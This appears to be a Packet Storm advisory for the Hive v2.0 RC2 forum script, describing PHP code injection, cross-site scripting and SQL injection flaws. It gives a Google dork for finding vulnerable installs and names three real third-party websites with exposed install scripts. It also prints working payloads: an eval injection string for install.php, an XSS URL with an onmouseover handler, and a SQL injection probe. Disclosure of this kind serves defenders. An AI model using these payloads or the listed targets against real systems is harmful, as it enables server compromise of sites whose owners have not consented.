Hive version 2.0 RC2 suffers from cross site scripting, code execution, and remote SQL injection vulnerabilities.
6af679c48de8375a85dccdedec19603ac83bdaaa7954773cdef8db2edc8743d1| # Title : Hive v2.0 RC2 Multi Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : "Powered by DigitalHive"
| # Tested on: windows 8.1 Français V.(Pro)
| # Bug : Stop Script
| # Download : http:///www.digitalhive.com
=======================================
Stop SCript working :
monocircus.free.fr/Forum/install/install.php?var=finish
sgdf.rodez.free.fr/forum/index.php
espace-associatif.org/forum/install/install.php
PHP code injection :
Vulnerability description
This script is vulnerable to PHP code injection.
PHP code injection is a vulnerability that allows an attacker to inject custom code into the server side scripting engine. This vulnerability occurs when an attacker can control all or part of an input string that is fed into an eval() function call. Eval will execute the argument as code.
This vulnerability affects /hive/install/install.php.
Attack details
URL encoded POST input base was set to ${@print(md5(test))}
Possible execution result: 63c19a6da79816b21429e5bb262daed8
Xss :
http://localhost//hive/base.php?mt=1%22%20onmouseover%3dprompt%28933088%29%20bad%3d%22&page=membres.php
SQL injection :
This vulnerability affects /hive/base.php.
Attack details
URL encoded POST input location was set to 1'"
Error message found:
supplied argument is not a valid MySQL result
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed